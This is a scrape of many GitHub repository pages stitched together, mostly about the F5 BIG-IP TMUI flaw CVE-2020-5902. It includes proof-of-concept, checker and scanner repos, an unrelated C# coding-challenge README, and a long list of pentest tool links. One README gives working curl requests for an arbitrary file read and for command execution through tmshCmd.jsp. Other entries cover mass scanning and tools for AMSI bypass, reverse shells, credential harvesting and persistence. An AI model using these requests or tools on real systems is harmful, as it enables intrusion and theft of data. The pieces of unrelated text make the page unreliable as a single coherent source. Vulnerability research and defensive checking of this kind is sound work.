Topics cloudformation-template f5networks f5 aws-ec2 auto-scaling Resources Readme Releases 52 v5.6.0 Latest on Jun 5 + 51 releases Contributors 10 Languages Shell 91.2% Python 6.2% Tcl 2.6%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit zwdOr committed 3ab8b01 4 minutes ago Adding README file Git stats 5 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .vs/GemographyBackendChallenge Adding README file 4 minutes ago Controllers Adding README file 4 minutes ago Interfaces Added models and cnotrollers 8 hours ago Models Adding README file 4 minutes ago Properties Implementing Solution 8 hours ago obj Adding README file 4 minutes ago .dockerignore adding docker file 7 hours ago .gitignore First commit 9 hours ago DockerFile Adding README file 4 minutes ago GemographyBackendChallenge.csproj Implementing Solution 8 hours ago GemographyBackendChallenge.csproj.user Implementing Solution 8 hours ago GemographyBackendChallenge.sln Implementing Solution 8 hours ago Program.cs Implementing Solution 8 hours ago README.md Adding README file 4 minutes ago Startup.cs Implementing Solution 8 hours ago appsettings.Development.json First commit 9 hours ago appsettings.json Implementing Solution 8 hours ago View code README.md gemography : backend-coding-challenge Requirement Develop a REST microservice that list the languages used by the 100 trending public repos on GitHub. For every language, you need to calculate the attributes below : Number of repos using this language The list of repos using the language! Dotnet build & run Approach NB : dotnet core 2.0 or higher version is required to run the project dotnet build dotnet run API End Point : http://localhost:5000/TrendingRepos/{language} Exemple : request : http://localhost:5000/TrendingRepos/java response : json object with the schema { "language" : "java", "total_count": "53537", "items" : {"id": 277342661, "node_id": "MDEwOlJlcG9zaXRvcnkyNzczNDI2NjE=", "name": "CVE-2020-5902", "full_name": "jas502n/CVE-2020-5902", "private": false, "owner": { "login": "jas502n", "id": 16593068, "node_id": "MDQ6VXN" .... } Docker running approach If you don't have any dotnet core version installed, I created a docker image to run the project in a docker container. open cmd Run commands : docker build -t backendchallenge . docker run -d -p 8080:80 --name webapi gemochallenge API End Point : http://localhost:8080/TrendingRepos/{language} Exemple Request : http://localhost:5000/TrendingRepos/java Response : json object response {"language":"java", "total_count":"53537", "items":[]} { "language" : "java", "total_count": "53537", "items" : {"id": 277342661, "node_id": "MDEwOlJlcG9zaXRvcnkyNzczNDI2NjE=", "name": "CVE-2020-5902", "full_name": "jas502n/CVE-2020-5902", "private": false, "owner": { "login": "jas502n", "id": 16593068, "node_id": "MDQ6VXN" .... } About No description, website, or topics provided. Resources Readme Releases No releases published Languages C# 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Un4gi committed e2a5175 11 minutes ago … Update README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 11 minutes ago View code README.md CVE-2020-5902 Proof of Concept for CVE-2020-5902 LFI curl -v -k 'https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/path/to/file RCE curl -v -k 'https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin About Proof of Concept for CVE-2020-5902 Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit JaneMandy committed 2f3222e 5 minutes ago … Initial commit Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 5 minutes ago View code README.md CVE-2020-5902 CVE-2020-5902 Exploit About CVE-2020-5902 Exploit Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit jas502n committed 1ef6ed5 4 minutes ago … Initial commit Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 4 minutes ago View code README.md CVE-2020-5902 CVE-2020-5902 BIG-IP About CVE-2020-5902 BIG-IP Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit deepsecurity-pe committed 0d0d9b4 1 minute ago Update README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 1 minute ago View code README.md GoF5-CVE-2020-5902 Script y Binario para validar la vulnerabilidad crítica en F5 BIG-IP Traffic Management User Interface (TMUI) (CVE-2020-5902) hecho en Golang. About Script para validar CVE-2020-5902 hecho en Go. Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit inho28 committed 78dd9a0 15 minutes ago … Initial commit Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 15 minutes ago View code README.md CVE-2020-5902-F5-BIGIP Scan from a given list for F5 BIG-IP and check for CVE-2020-5902 About Scan from a given list for F5 BIG-IP and check for CVE-2020-5902 Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit MrCl0wnLab committed 2a27c27 12 minutes ago Initial commit Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time LICENSE Initial commit 12 minutes ago README.md Initial commit 12 minutes ago View code README.md checker-CVE-2020-5902 Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities. About Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities. Resources Readme License Apache-2.0 License Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit momika233 committed 83e60f9 3 minutes ago Create cve-2020-5902.nse Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time cve-2020-5902.nse Create cve-2020-5902.nse 3 minutes ago readme.md Create readme.md 4 minutes ago View code readme.md NMAP script for F5 BIG-IP "TMUI" RCE Vulnerability Referer:https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse About No description, website, or topics provided. Resources Readme Releases No releases published Languages Lua 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit GovindPalakkal committed 0db0f9f 10 minutes ago Update README.md Git stats 4 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 10 minutes ago Screen Shot 2020-07-08 at 4.54.59 PM.png Add files via upload 11 minutes ago cve-checker.sh Create cve-checker.sh 40 minutes ago View code README.md Cve-2020-5029-finder It is a small script to fetch out the subdomains/ip vulnerable to CVE-2020-5902 written in bash. Affected Version In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. Usage In order to use this you need to install httporbe installed #confuration first list out the subdomains in a list.txt (with http/https) you can use httporbe for this cat list.txt | httprobe | tee -a domains (here the ip/domains will store as http or https://xx.xx.xx.xx) ./cve-checker.sh /user/path_to_filtered_domians About It is a small script to fetch out the subdomains/ip vulnerable to CVE-2020-5902 written in bash Resources Readme Releases No releases published Languages Shell 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit wdlid committed 96f3154 10 hours ago … Create fix Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time fix Create fix 10 hours ago View code About Fix CVE-2020-5902 Releases No releases published Languages Shell 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit TheCyberViking Delete f5pocmultiscan.py … d13c06e 4 hours ago Delete f5pocmultiscan.py d13c06e Git stats 7 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .gitignore Initial commit 16 days ago F5pocscan.py Create F5pocscan.py 15 days ago LICENSE Initial commit 16 days ago README.md Update README.md 16 days ago View code README.md CVE-2020-5902 Vulnerability Checker While looking at the vulnerabilty with fellow researchers we came to the idea that most of the current ways in which to test for the vulnerability can be classed as a form of compromise of the system. We wanted to develop a way in which to test the vulnerability so that it doest not compromise the system being scanned. for this we wrote this small python tool, In does a GET request to the login for the system, this shows the the system is avilable and viewable and could be open to compromise from an attacker, and in turn doesnt not compromise any system informaiton or client data. What is F5 BIG-IP The F5 BIG-IP DNS uses topology-based load balancing to inspect a user's IP and determine the most efficient data center. The term load balancing can also refer to file servers, when file protocol requests are distributed across file servers to overcome the capacity, bandwidth, or CPU limitations of any single system. That one singular quote should give you an idea VERY quickly why this is a ciritcial vulenrability and mixed with the simplisticness of the attack seen bellow. CVE-2020-5902 this is a critical CVSS 10.0 vulnerability discovered in F5 Big-IP systems, in versions 5.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1. The exploitation process the attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration." more information on the vulnerability can be found from F5 support here https://support.f5.com/csp/article/K52145254 Exploitation The exploitation is straight forward and very public at current and simplistic using a simple GET request or a curl command that can be done by any skid with a up todate windows command prompt: Acknowledgement This tool was wrote by my CyberViking and a fellow researcher who wanted to re-name nameless, you know who you are you beautiful bitch. if you have any suggestions hit me up @TheCyberViking About Simple Vulnerability Checker Wrote by me "@TheCyberViking" and A fellow Researcher who wanted to be left Nameless... you know who you are you beautiful bitch Resources Readme License MIT License Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit ihebski Update README.md … 18ef747 3 minutes ago Update README.md 18ef747 Git stats 10 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time BIG-IPF5_CVE-2020-5902.sh CVE-2020-5902 27 minutes ago README.md Update README.md 3 minutes ago citrix_CVE-2019-19781.sh CVE-2019-19781 27 minutes ago scan_cisco_asa_CVE-2020-3452.sh CVE-2020-3452 25 minutes ago template.sh Script template 24 minutes ago View code README.md are_we_vulnerable Checking the recently disclosed vulnerabilities over the network. BIG-IPF5_CVE(2020-5902) - https://github.com/yasserjanah/CVE-2020-5902 Citrix Application Delivery Controller and Citrix Gateway(CVE-2019-19781) - https://github.com/mpgn/CVE-2019-19781 Cisco Adaptive Security Appliance and Firepower Threat Defense (CVE-2020-3452) - https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-3452.nse Usage $ echo "host1 host2 host3" | ./scanner Reading an input from a file $ cat myservers.txt | ./scanner About checking the recently disclosed vulnerabilities over the network. Topics citrix bigipf5 cisco-asa Resources Readme Languages Shell 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit AnonVulc Create README.md … 853e8f9 5 minutes ago Create README.md 853e8f9 Git stats 1 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Create README.md 5 minutes ago View code README.md Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner Crawler Web Exploitation Tools Windows Privilege Escalation / Audit T3 Enumeration Linux Privilege Escalation / Audit Credential harvesting Windows Specific Credential harvesting Linux Specific Data Exfiltration - DNS/ICMP/Wifi Exfiltration Git Specific Reverse Engineering / decompiler Forensics Network Attacks Specific MITM service Exploitation Sniffing / Evaluation / Filtering Scanner / Exploitation-Frameworks / Automation Default Credential Scanner Payload Generation / AV-Evasion / Malware Creation Domain Finding / Subdomain Enumeration Scanner network level Email Gathering Domain Auth + Exploitation Network service - Login Brute Force + Wordlist attacks Command & Control Frameworks Wifi Tools Raspberri PI Exploitation Social Engeneering Wordlists / Wordlist generators Obfuscation Source Code Analysis No category yet Industrial Control Systems NAC bypass JMX Exploitation And many more. I created this repo to have an overview over my starred repos. I was not able to filter in categories before. Feel free to use it for yourself. I do not list Kali default tools as well as several testing tools which are state of the art. STRG+F searches are helpful here. Windows Active Directory Pentest General usefull Powershell Scripts https://github.com/S3cur3Th1sSh1t/WinPwn - https://github.com/dafthack/MailSniper https://github.com/putterpanda/mimikittenz https://github.com/dafthack/DomainPasswordSpray https://github.com/mdavis332/DomainPasswordSpray - same but kerberos auth for more stealth and lockout-sleep https://github.com/jnqpblc/SharpSpray - domainpasswordspray executable with lockout-sleep https://github.com/Arvanaghi/SessionGopher https://github.com/samratashok/nishang https://github.com/PowerShellMafia/PowerSploit https://github.com/fdiskyou/PowerOPS https://github.com/giMini/PowerMemory https://github.com/Kevin-Robertson/Inveigh https://github.com/MichaelGrafnetter/DSInternals https://github.com/PowerShellEmpire/PowerTools https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/hlldz/Invoke-Phant0m https://github.com/leoloobeek/LAPSToolkit https://github.com/sense-of-security/ADRecon https://github.com/Arno0x/PowerShellScripts https://github.com/S3cur3Th1sSh1t/Grouper https://github.com/l0ss/Grouper2 https://github.com/NetSPI/PowerShell https://github.com/NetSPI/PowerUpSQL https://github.com/GhostPack - Various Powersploit Tasks in C# https://github.com/Kevin-Robertson/Powermad - Adidns Attacks AMSI Bypass restriction Bypass https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell https://github.com/p3nt4/PowerShdll https://github.com/jaredhaight/PSAttack https://github.com/Cn33liz/p0wnedShell https://github.com/cobbr/InsecurePowerShell https://github.com/Mr-Un1k0d3r/PowerLessShell https://github.com/bitsadmin/nopowershell C# Powershell https://github.com/OmerYa/Invisi-Shell https://github.com/Hackplayers/Salsa-tools - Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched https://github.com/padovah4ck/PSByPassCLM - Constrained language mode bypass https://github.com/rasta-mouse/AmsiScanBufferBypass https://github.com/itm4n/VBA-RunPE - Applocker Bypass https://github.com/cfalta/PowerShellArmoury https://github.com/Mr-B0b/SpaceRunner - This tool enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace. https://github.com/RythmStick/AMSITrigger - The Hunt for Malicious Strings https://github.com/rmdavy/AMSI_Ordinal_Bypass - Bypass AMSI and Defender using Ordinal Values in VBS https://github.com/mgeeky/Stracciatella - OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, CLM and Script Block Logging disabled at startup https://github.com/med0x2e/NoAmci - Using DInvoke to patch AMSI.dll in order to bypass AMSI detections triggered when loading .NET tradecraft via Assembly.Load(). Payload Hosting https://github.com/kgretzky/pwndrop - Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV. https://github.com/sc0tfree/updog - Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth. Network Share Scanner Find Juicy Stuff https://github.com/SnaffCon/Snaffler - a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 https://github.com/djhohnstein/SharpShares - Enumerate all network shares in the current domain. Also, can resolve names to IP addresses. https://github.com/vivami/SauronEye - Search tool to find specific files containing specific words, i.e. files containing passwords.. https://github.com/leftp/VmdkReader - .NET 4.0 Console App to browse VMDK / VHD images and extract files Reverse Shellz https://github.com/xct/xc - A small reverse shell for Linux & Windows https://github.com/cytopia/pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE) https://github.com/Kudaes/LOLBITS - C# reverse shell using Background Intelligent Transfer Service (BITS) as communication protocol and direct syscalls for EDR user-mode hooking evasion. Backdoor finder https://github.com/linuz/Sticky-Keys-Slayer https://github.com/ztgrace/sticky_keys_hunter https://github.com/countercept/doublepulsar-detection-script Lateral Movement https://github.com/0xthirteen/SharpRDP https://github.com/0xthirteen/MoveKit - WMI,SMB,RDP,SCM,DCOM Lateral Movement techniques https://github.com/0xthirteen/SharpMove - WMI, SCM, DCOM, Task Scheduler and more https://github.com/rvrsh3ll/SharpCOM - C# Port of Invoke-DCOM https://github.com/malcomvetter/CSExec - An implementation of PSExec in C# https://github.com/byt3bl33d3r/CrackMapExec https://github.com/nccgroup/WMIcmd https://github.com/rasta-mouse/MiscTools - CsExec, CsPosh (Remote Powershell Runspace), CsWMI,CsDCOM https://github.com/byt3bl33d3r/DeathStar - Automate Getting Dom-Adm https://github.com/SpiderLabs/portia - automated lateral movement https://github.com/Screetsec/Vegile - backdoor / rootkit https://github.com/DanMcInerney/icebreaker - automation for various mitm attacks + vulns https://github.com/MooseDojo/apt2 - automated penetration toolkit https://github.com/hdm/nextnet - Netbios Network interface Enumeration (discovery of dual homed hosts) https://github.com/mubix/IOXIDResolver - Find dual homed hosts over DCOM https://github.com/Hackplayers/evil-winrm https://github.com/bohops/WSMan-WinRM - A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object https://github.com/dirkjanm/krbrelayx - unconstrained delegation, printer bug (MS-RPRN) exploitation, Remote ADIDNS attacks https://github.com/Mr-Un1k0d3r/SCShell - Fileless lateral movement tool that relies on ChangeServiceConfigA to run command https://github.com/rvazarkar/GMSAPasswordReader - AD Bloodhound 3.0 Path https://github.com/fdiskyou/hunter https://github.com/360-Linton-Lab/WMIHACKER - A Bypass Anti-virus Software Lateral Movement Command Execution Tool POST Exploitation https://github.com/mubix/post-exploitation https://github.com/emilyanncr/Windows-Post-Exploitation https://github.com/nettitude/Invoke-PowerThIEf - Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived. https://github.com/ThunderGunExpress/BADministration - McAfee Epo or Solarwinds post exploitation https://github.com/bohops/SharpRDPHijack - A POC Remote Desktop (RDP) session hijack utility for disconnected sessions https://github.com/antonioCoco/RunasCs - RunasCs - Csharp and open version of windows builtin runas.exe https://github.com/klsecservices/Invoke-Vnc - Powershell VNC injector https://github.com/mandatoryprogrammer/CursedChrome - Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies, allowing you to browse sites as your victims. https://github.com/djhohnstein/WireTap - .NET 4.0 Project to interact with video, audio and keyboard hardware. https://github.com/GhostPack/Lockless - Lockless allows for the copying of locked files. https://github.com/slyd0g/SharpClipboard - C# Clipboard Monitor https://github.com/hlldz/pickl3 - Windows active user credential phishing tool https://github.com/infosecn1nja/SharpDoor - SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file. Wrapper for various tools https://github.com/S3cur3Th1sSh1t/PowerSharpPack - Various .NET Tools wrapped in Powershell https://github.com/bohops/GhostBuild - GhostBuild is a collection of simple MSBuild launchers for various GhostPack/.NET projects https://github.com/rvrsh3ll/Rubeus-Rundll32 - rundll32 Wrapper for Rubeus Pivot https://github.com/0x36/VPNPivot https://github.com/securesocketfunneling/ssf https://github.com/p3nt4/Invoke-SocksProxy https://github.com/sensepost/reGeorg - Webshell tunnel over socks proxy - pentesters dream https://github.com/nccgroup/ABPTTS TCP tunneling over HTTP/HTTPS for web application servers like reGeorg https://github.com/RedTeamOperations/PivotSuite https://github.com/trustedsec/egressbuster - check for internet access over open ports / egress filtering https://github.com/vincentcox/bypass-firewalls-by-DNS-history https://github.com/shantanu561993/SharpChisel - C# Wrapper around Chisel from https://github.com/jpillora/chisel - A fast TCP tunnel over HTTP https://github.com/esrrhs/pingtunnel - ping tunnel is a tool that advertises tcp/udp/socks5 traffic as icmp traffic for forwarding. https://github.com/sysdream/ligolo - Reverse Tunneling made easy for pentesters, by pentesters https://github.com/nccgroup/SocksOverRDP - Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop https://github.com/blackarrowsec/mssqlproxy - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse Active Directory Audit and exploit tools https://github.com/mwrlabs/SharpGPOAbuse https://github.com/BloodHoundAD/BloodHound https://github.com/BloodHoundAD/SharpHound3 - C# Data Collector for the BloodHound Project, Version 3 https://github.com/chryzsh/awesome-bloodhound https://github.com/hausec/Bloodhound-Custom-Queries https://github.com/vletoux/pingcastle https://github.com/cyberark/ACLight https://github.com/canix1/ADACLScanner https://github.com/fox-it/Invoke-ACLPwn https://github.com/fox-it/aclpwn.py - same as invoke-aclpwn but in python https://github.com/dirkjanm/ldapdomaindump - Active Directory information dumper via LDAP https://github.com/tothi/rbcd-attack - Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket https://github.com/NotMedic/NetNTLMtoSilverTicket - SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket https://github.com/FatRodzianko/Get-RBCD-Threaded - Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory environments Persistence on windows https://github.com/fireeye/SharPersist https://github.com/outflanknl/SharpHide Web Application Pentest Framework Discovery https://github.com/Tuhinshubhra/CMSeeK https://github.com/Dionach/CMSmap - Wordpress, Joomla, Drupal Scanner https://github.com/wpscanteam/wpscan https://github.com/Ekultek/WhatWaf Framework Scanner / Exploitation https://github.com/wpscanteam/wpscan - wordpress https://github.com/n00py/WPForce https://github.com/m4ll0k/WPSeku https://github.com/swisskyrepo/Wordpresscan https://github.com/rastating/wordpress-exploit-framework https://github.com/coldfusion39/domi-owned - lotus domino https://github.com/droope/droopescan - Drupal https://github.com/whoot/Typo-Enumerator - Typo3 https://github.com/rezasp/joomscan - Joomla Web Vulnerability Scanner / Burp Plugins https://github.com/m4ll0k/WAScan - all in one scanner https://github.com/s0md3v/XSStrike - XSS discovery https://github.com/federicodotta/Java-Deserialization-Scanner https://github.com/d3vilbug/HackBar https://github.com/gyoisamurai/GyoiThon https://github.com/snoopysecurity/awesome-burp-extensions https://github.com/BishopFox/GadgetProbe - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths. Network- / Service-level Vulnerability Scanner https://github.com/scipag/vulscan https://github.com/zdresearch/OWASP-Nettacker File / Directory / Parameter discovery https://github.com/OJ/gobuster https://github.com/nccgroup/dirble https://github.com/maK-/parameth https://github.com/devanshbatham/ParamSpider - Mining parameters from dark corners of Web Archives https://github.com/s0md3v/Arjun - https://github.com/Cillian-Collins/dirscraper - Directory lookup from Javascript files https://github.com/hannob/snallygaster https://github.com/maurosoria/dirsearch https://github.com/s0md3v/Breacher - Admin Panel Finder https://github.com/mazen160/server-status_PWN Crawler https://github.com/s0md3v/Photon - https://github.com/kgretzky/dcrawl https://github.com/lc/gau - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. Web Exploitation Tools https://github.com/OsandaMalith/LFiFreak - lfi https://github.com/enjoiz/XXEinjector - xxe https://github.com/tennc/webshell - shellz https://github.com/flozz/p0wny-shell https://github.com/epinna/tplmap - ssti https://github.com/orf/xcat - xpath injection https://github.com/almandin/fuxploider - File Uploads https://github.com/nccgroup/freddy - deserialization https://github.com/irsdl/IIS-ShortName-Scanner - IIS Short Filename Vuln. exploitation https://github.com/frohoff/ysoserial - Deserialize Java Exploitation https://github.com/pwntester/ysoserial.net - Deserialize .NET Exploitation https://github.com/internetwache/GitTools - Exploit .git Folder Existence https://github.com/cujanovic/SSRF-Testing - SSRF Tutorials https://github.com/ambionics/phpggc - PHP Unserialize Payload generator https://github.com/BuffaloWill/oxml_xxe - Malicious Office XXE payload generator https://github.com/tijme/angularjs-csti-scanner - Angularjs Csti Scanner https://github.com/0xacb/viewgen - Deserialize .NET Viewstates https://github.com/Illuminopi/RCEvil.NET - Deserialize .NET Viewstates REST API Audit https://github.com/flipkart-incubator/Astra Swagger File API Attack https://github.com/imperva/automatic-api-attack-tool Windows Privilege Escalation / Audit https://github.com/itm4n/PrivescCheck - Privilege Escalation Enumeration Script for Windows https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS - powerfull Privilege Escalation Check Script with nice output https://github.com/AlessandroZ/BeRoot https://github.com/rasta-mouse/Sherlock https://github.com/hfiref0x/UACME - UAC https://github.com/rootm0s/WinPwnage - UAC https://github.com/abatchy17/WindowsExploits https://github.com/dafthack/HostRecon https://github.com/sensepost/rattler - find vulnerable dlls for preloading attack https://github.com/WindowsExploits/Exploits https://github.com/Cybereason/siofra - dll hijack scanner https://github.com/0xbadjuju/Tokenvator - admin to system https://github.com/MojtabaTajik/Robber https://github.com/411Hall/JAWS https://github.com/GhostPack/SharpUp https://github.com/GhostPack/Seatbelt https://github.com/A-mIn3/WINspect https://github.com/hausec/ADAPE-Script https://github.com/SecWiki/windows-kernel-exploits https://github.com/bitsadmin/wesng https://github.com/rasta-mouse/Watson Windows Privilege Abuse (Privilege Escalation) https://github.com/gtworek/Priv2Admin - Abuse Windows Privileges https://github.com/itm4n/UsoDllLoader - load malicious dlls from system32 https://github.com/TsukiCTF/Lovely-Potato - Exploit potatoes with automation https://github.com/antonioCoco/RogueWinRM - from Service Account to System https://github.com/antonioCoco/RoguePotato - Another Windows Local Privilege Escalation from Service Account to System https://github.com/itm4n/PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 https://github.com/BeichenDream/BadPotato - itm4ns Printspoofer in C# https://github.com/itm4n/FullPowers - Recover the default privilege set of a LOCAL/NETWORK SERVICE account T3 Enumeration https://github.com/quentinhardy/jndiat Linux Privilege Escalation / Audit https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - powerfull Privilege Escalation Check Script with nice output https://github.com/mzet-/linux-exploit-suggester https://github.com/rebootuser/LinEnum https://github.com/diego-treitos/linux-smart-enumeration https://github.com/CISOfy/lynis https://github.com/AlessandroZ/BeRoot 